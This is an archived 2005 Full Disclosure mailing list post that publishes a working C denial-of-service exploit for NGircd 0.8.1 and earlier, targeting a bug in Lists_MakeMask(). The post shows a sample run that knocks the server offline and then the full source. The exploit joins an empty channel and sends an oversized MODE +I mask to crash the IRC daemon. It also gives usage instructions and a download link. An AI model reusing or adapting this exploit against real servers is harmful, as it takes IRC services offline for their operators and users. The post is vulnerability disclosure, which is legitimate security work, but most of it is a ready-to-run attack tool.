Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

NGircd <= 0.8.1 Remote DoS (exploit)
From: "CorryL" <corryl () sitoverde com>
Date: Sat, 5 Feb 2005 19:21:25 +0100

The NGircd <= 0.8.1 il vulnerable in function
Lists_MakeMask() of src/lists.c .
The bug is discovered by Florian Westphal.

This is exploit coded by Expanders component of x0n3-h4ck Italian Security
Team

ScreenShoot:

-=[x0n3-h4ck]=--=[00:48:19]=--=[/root]=--=[Account: root]=-

-=[#]  ./ngircd_dos x0n3-h4ck.org 12345 Angel DarkChan


-=[ NGircd <= 0.8.1 Remote DoS ::: Coded by Expanders ]=-


Connecting to target    ...[Done]
Building evil buffer        ...[Done]
Sending NICK               ...[Done]
Sending USER               ...[Done]
Joining Channel            ...[Done]
Sending evil request    ...[Done]
Trying to reconnect      ...[Done] -> Attack Success! Lets party!

The Irc Server is Killed !!

Exploit:

/*
      NGircd <= 0.8.1     Remote Denial Of Service       Coded by: Expanders

      Usage:  ./ngircd_dos <Host> <Ip> <NickToUse> <ChannellToJoin>

   NOTE:  The channel must be EMPTY to let the exploit use +I mode

      Example:

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);


int main(int argc, char *argv[]) {
     struct sockaddr_in trg;
     struct hostent *he;
 long addr;
     int sockfd, buff,rc;
 char evilbuf[1024];
 char buffer[1024];
 char *nick="AntiServer";
 char *channel="Die_NGircd";
 char *request;
 if(argv[3] != NULL) nick=argv[3];
 if(argv[4] != NULL) channel=argv[4];
 if(argc < 3 ) {
  help(argv[0]);
  exit(0);
 }
 printf("\n\n-=[ NGircd <= 0.8.1 Remote DoS ::: Coded by Expanders ]=-\n");
     he = gethostbyname(argv[1]);
     sockfd = socket(AF_INET, SOCK_STREAM, 0);
     request = (char *) malloc(12344);
     trg.sin_family = AF_INET;
     trg.sin_port = htons(atoi(argv[2]));
     trg.sin_addr = *((struct in_addr *) he->h_addr);
     memset(&(trg.sin_zero), '\0', 8);
 printf("\n\nConnecting to target \t...");
 rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
 if(rc==0)
 {
  printf("[Done]\nBuilding evil buffer\t...");
  memset(evilbuf,65,300);
  memset(evilbuf+300,64,1);
  memset(evilbuf+301,65,128);
  printf("[Done]\nSending NICK           \t...");
  sprintf(request,"NICK %s\n",nick);
  send(sockfd,request,strlen(request),0);
  printf("[Done]\nSending USER           \t...");
  sprintf(request,"USER %s x0n3-h4ck.org eth0.x0n3-h4ck.org
:%s\n",nick,nick);
  send(sockfd,request,strlen(request),0);
  buff=recv(sockfd, buffer, 256, 0);
  printf("[Done]\nJoining Channel        \t...");
  sprintf(request,"JOIN #%s\n",channel);
  send(sockfd,request,strlen(request),0);
  printf("[Done]\nSending evil request   \t...");
  sprintf(request,"MODE #%s +I %s\n",channel,evilbuf);
  send(sockfd,request,strlen(request),0);
  sprintf(request,"QUIT www.x0n3-h4ck.org\n",evilbuf);
  send(sockfd,request,strlen(request),0);
  sleep(2);
  printf("[Done]\nTrying to reconnect\t...");
  close(sockfd);
  sockfd = socket(AF_INET, SOCK_STREAM, 0);
  sleep(1);
  rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
  if(rc==0)
   printf("[Fail] -> Damn! Attack Failed!\n\n");
  else
   printf("[Done] -> Attack Success! Lets party!\n\n");
 }
 else
  printf("[Fail] -> Unable to connect\n\n");
 close(sockfd);
 return 0;

}

void help(char *program_name) {

 printf("\n\t-=[      NGircd <= 0.8.1 Remote Denial Of Service      ]=-\n");
 printf("\t-=[                                                    ]=-\n");
 printf("\t-=[      Coded by
ders -/www.x0n3-h4ck.org\\-      ]=-\n\n");
 printf("Usage: %s <Host> <Ip> <NickToUse>
<ChannellToJoin>\n",program_name);
}


downloaded from http://x0n3-h4ck.org/upload/ngircd-0.8.1-dos.tar.gz

Info:

CorryL

corryl80 () gmail com

www.x0n3-h4ck.org

_________________________________
www.seekstat.it is your web stat
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
  • NGircd <= 0.8.1 Remote DoS (exploit) CorryL (Feb 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault